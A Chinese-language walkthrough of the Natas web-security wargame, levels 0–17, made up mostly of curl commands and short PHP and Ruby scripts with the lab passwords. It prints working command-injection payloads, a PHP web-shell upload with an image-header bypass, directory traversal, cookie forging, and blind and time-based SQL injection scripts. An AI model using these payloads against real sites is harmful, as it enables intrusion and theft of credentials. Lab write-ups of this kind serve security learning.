Natas Wargame是关于web安全的wargame。
Level 0
curl -su natas0:natas0 http://natas0.natas.labs.overthewire.org | grep password
Level 1
body
标签使用了oncontextmenu
屏蔽右键菜单,但是可以不理会继续使用curl
:
curl -su natas1:gtVrDuiDfck831PqWsLEZy5gyDz1clto http://natas1.natas.labs.overthewire.org
Level 2
curl -su natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org
看到源代码中有文件/files/pixel.png
,因此访问目录/files/
:
curl -su natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/
发现文件users.txt
,访问得到natas3
的密码。
Level 3
curl -su natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/robots.txt
发现目录/s3cr3t/
,因此访问该目录:
curl -su natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/s3cr3t/
curl -su natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt
Level 4
提示:Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
,
因此用-e
选项设置Referer:
:
curl -su natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org/ -e http://natas5.natas.labs.overthewire.org/
Level 5
curl -isu natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org
发现Set-Cookie: loggedin=0
,尝试用-b
指定cookie:
curl -su natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org -b 'loggedin=1'
Level 6
访问/index-source.html
发现可疑文件includes/secret.inc
,访问之得到"FOEIUWGHFEEUHOFUOIU"
。
curl -su natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 -F 'secret=FOEIUWGHFEEUHOFUOIU' -F 'submit=1' http://natas6.natas.labs.overthewire.org
Level 7
可以对index.php
实施directory traversal attack:
curl -su natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 http://natas7.natas.labs.overthewire.org/\?page\=/etc/natas_webpass/natas8
Level 8
$encodedSecret
是下面函数编码得到的:
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
echo 3d3d516343746d4d6d6c315669563362 | xxd -p -r | rev | base64 -d
解码得到密码,然后:
curl -su natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe -F secret=oubWYf2kBq -F submit=1 http://natas8.natas.labs.overthewire.org
Level 9
curl -su natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl -F 'needle=;cat /etc/natas_webpass/natas10 #' -F submit=1 http://natas9.natas.labs.overthewire.org
Level 10
和上一关类似,但对needle
的值做了过滤,不允许出现;|&
三种字符。
curl -su natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu -F 'needle=. /etc/natas_webpass/natas11 #' -F submit=1 http://natas10.natas.labs.overthewire.org
Level 11
curl -Isu natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org
得到cookie:Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
。
根据/index-source.html
:cookie[data] xor key = tempdata
,所以cookie[data] xor tempdata = key
。
编写如下PHP程序运行得到key
:qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
。
<?php
$outText = base64_decode('ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw');
$key = json_encode(array("showpassword"=>"no", "bgcolor"=>"#ffffff"));
$in = '';
for ($i=0; $i < strlen($outText); $i++) {
$in .= $outText[$i] ^ $key[$i % strlen($key)];
echo $in;
?>
然后对代码做调整:
<?php
$outText = '';
$in = json_encode(array("showpassword"=>"yes", "bgcolor"=>"#ffffff"));
$key = 'qw8J';
for ($i=0; $i < strlen($in); $i++) {
$outText .= $in[$i] ^ $key[$i % strlen($key)];
echo base64_encode($outText);
?>
执行得到cookie,在curl
里用-b
设置这个cookie:
curl -su natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK -b data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK http://natas11.natas.labs.overthewire.org
Level 12
curl -isu natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 -F filename=a.php -F 'uploadedfile=@-;filename=a.php' http://natas12.natas.labs.overthewire.org <<< '<?php passthru($_GET['cmd']); ?>'
上传一个简单的web shell,然后执行
curl -isu natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 'http://natas12.natas.labs.overthewire.org/upload/vvrbw84pu0.php?cmd=cat+/etc/natas_webpass/natas13'
读取密码。
Level 13
和上一关的差别是多使用了exif_imagetype
检测上传文件的类型:
else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name']))
curl -su natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY -F filename=a.php -F 'uploadedfile=@-;filename=a.php' http://natas13.natas.labs.overthewire.org <<< $'\xff\xd8\xff<?php passthru($_GET['cmd']); ?>' | grep uploaded
curl -su natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY 'http://natas13.natas.labs.overthewire.org/upload/8xr6u3ow6k.php?cmd=cat+/etc/natas_webpass/natas14'
Level 14
代码中有:
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
,存在SQL injection漏洞:
curl -su natas14:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 -F 'username=" or 1#' http://natas14.natas.labs.overthewire.org
Level 15
代码中有:
if(mysql_num_rows($res) > 0)
从服务端返回的HTML里是否有user exists
可以知道注入的SQL语句返回的记录行数是否为空。可以二分搜索密码的每一位,
一般密码字符的ASCII码在33到126之间,可以用下界32表示密码结束。
require 'net/http'
Net::HTTP.start('natas15.natas.labs.overthewire.org') {|http|
1.upto(1992) {|pos|
h = 126
while l < h
m = (l + h) / 2
req = Net::HTTP::Post.new('/')
req.basic_auth 'natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'
req.body = %{username=natas16" and #{m} < ascii(mid(password,#{pos},1)) #}
res = http.request(req)
if res.body =~ /user exists/
l = m + 1
break if l == 32
print l.chr
Level 16
Level 11的升级版,现在过滤;|&`'"
这几种字符了。
curl -o/dev/null -su natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh -F 'needle=$(cat /etc/natas_webpass/natas17 > /tmp/natas17)' http://natas16.natas.labs.overthewire.org
Level 9允许执行shell命令:
curl -su natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl -F 'needle=;cat /tmp/natas17 #' -F submit=1 http://natas9.natas.labs.overthewire.org
Level 17
代码和Level 15类似,但这次服务端不再提供注入的SQL返回的结果是否非空的信息了。
可以采用time-based SQL injection的方法:
curl -su natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw -F 'username=natas18" and if(ascii(mid(password,1,1)) < 128,sleep(1),1) #' http://natas17.natas.labs.overthewire.org
用if
语句让服务器MySQL对ascii(mid(password,1,1)) < 128
求值,
若为真则sleep
一秒,通过检测收到服务端返回结果的用时来得知表达式是否为真。
改变128得到二分搜索密码每个字符的代码。因为time-based注入方式执行时间较长,
考虑用多线程提速:
require 'net/http'
timeout = 2
ans = '*' * 32
worker = ->from, to {
Net::HTTP.start('natas17.natas.labs.overthewire.org') {|http|
http.read_timeout = timeout
(from...to).each {|pos|
h = 126
while l < h
m = (l + h) / 2
req = Net::HTTP::Post.new('/')
req.basic_auth 'natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'
req.body = %{username=natas18" and if(#{m} < ascii(mid(password,#{pos+1},1)), sleep(#{timeout}), 1) #}
begin
http.request(req)
rescue Net::ReadTimeout
l = m + 1
ans[pos] = l.chr
16.times.map {|i| Thread.new { worker[i*2, i*2+2] } }.each &:join
puts ans
得到密码:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
。
其他wargames资源